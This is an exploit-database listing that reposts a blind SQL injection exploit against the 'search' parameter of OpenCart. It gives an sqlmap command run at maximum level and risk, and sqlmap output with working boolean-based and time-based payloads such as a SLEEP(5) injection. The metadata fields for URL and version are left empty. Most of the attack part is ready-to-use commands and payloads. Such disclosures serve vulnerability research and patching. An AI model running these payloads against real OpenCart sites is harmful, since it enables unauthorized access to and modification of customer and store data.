OpenCart Core 'search' - Blind SQLi

CVE Category Price Severity
CVE-2020-14983 CWE-89 $2,000 High
Author Risk Exploitation Type Date
exploitalert High Remote 2024-04-01
Our sensors found this exploit at:

Below is a copy:

OpenCart Core 'search' - Blind SQLi
# Exploit Title: OpenCart Core 'search' - Blind SQLi
# Date: 2024-04-1
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version:
# Tested on: XAMPP, Linux
# Contact:

* Description :

Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :
- Go to :
- New Use command Sqlmap : sqlmap -u "" --level=5 --risk=3  -p search  --dbs 


Output :

Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/search&search=') AND 2427=2427-- drCa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.